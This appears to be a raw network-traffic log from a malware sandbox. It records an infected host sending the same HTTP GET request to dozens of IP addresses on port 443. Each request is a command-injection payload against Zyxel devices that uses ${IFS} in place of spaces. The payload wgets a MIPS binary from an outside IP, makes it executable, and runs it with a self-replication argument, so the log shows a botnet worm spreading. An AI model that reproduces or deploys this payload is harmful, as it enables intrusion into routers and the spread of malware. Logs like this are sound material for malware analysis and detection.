                                      Jan 14, 2024 15:50:49.366772890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5088192.168.2.145032825.106.45.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.366827011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5089192.168.2.1436562216.138.177.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.366866112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5090192.168.2.1443868162.115.254.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.366926908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5091192.168.2.1442020113.118.159.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.366991997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5092192.168.2.1438036195.190.145.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.367029905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5093192.168.2.146059884.19.27.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.367110014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5094192.168.2.144711041.227.161.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.367151022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5095192.168.2.144810464.213.100.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.367208958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5096192.168.2.1434518176.102.112.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.367268085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5097192.168.2.1435124194.7.64.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.367347956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5098192.168.2.143468270.245.251.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.367383003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5099192.168.2.1435262129.210.83.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.367446899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5100192.168.2.145799048.20.172.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.367507935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5101192.168.2.146035693.65.163.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.367552042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5102192.168.2.144526276.63.182.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.367639065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5103192.168.2.146041861.155.12.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.367681980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5104192.168.2.143394299.179.127.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.367737055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5105192.168.2.1458276138.60.47.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.367799997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5106192.168.2.1444842172.240.42.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.367855072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5107192.168.2.1440956125.116.138.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.367938042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5108192.168.2.1446752187.169.185.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.367973089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5109192.168.2.1445688120.156.209.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.368029118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5110192.168.2.1448880196.142.198.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.368088007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5111192.168.2.1443244122.146.186.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.368149042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5112192.168.2.1436298198.88.73.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.368180037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5113192.168.2.1443352189.132.48.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.368243933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5114192.168.2.1459740192.181.101.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.368299961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5115192.168.2.144444462.203.43.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.368345976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5116192.168.2.1439022147.207.165.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.368402004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5117192.168.2.1443490177.4.207.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.368463993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5118192.168.2.145122045.223.253.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.368520021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5119192.168.2.14461461.103.182.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.368567944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5120192.168.2.1451930182.135.130.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.368614912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5121192.168.2.1460188157.123.115.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.368650913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5122192.168.2.1434866141.83.201.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.368709087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5123192.168.2.1460520213.220.218.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.368765116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5124192.168.2.1438616211.89.193.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.368838072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5125192.168.2.1445130168.166.131.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.368905067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5126192.168.2.144781623.49.254.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.368984938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5127192.168.2.1439436206.208.61.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.369019032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5128192.168.2.1441694175.73.44.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.369122028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5129192.168.2.1447788203.226.72.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.369180918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5130192.168.2.1448636139.166.199.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.369240999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5131192.168.2.145343251.164.82.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.369298935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5132192.168.2.143623420.242.166.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.369369030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5133192.168.2.145502693.34.225.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.369420052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5134192.168.2.1447716188.186.2.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.369472027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5135192.168.2.1452942123.194.216.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.369508982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5136192.168.2.1438640102.186.168.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.369590998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5137192.168.2.1453512119.55.142.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.369652033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5138192.168.2.1453886196.12.172.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.369692087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5139192.168.2.1441430102.190.238.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.369745016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5140192.168.2.1436424192.228.234.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.369801044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5141192.168.2.145112059.21.62.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.369849920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5142192.168.2.144021620.71.83.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.369899988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5143192.168.2.1434070166.28.87.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.369940042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5144192.168.2.1443410112.58.236.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.369997025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5145192.168.2.1451304115.165.91.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.370076895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5146192.168.2.1445242160.17.96.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.370104074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5147192.168.2.1437206163.135.132.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.370163918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5148192.168.2.143589638.158.19.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.370223045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5149192.168.2.1436532202.73.115.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:49.370254993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5150192.168.2.14384624.208.49.37443
                                      TimestampBytes transferredDirectionData
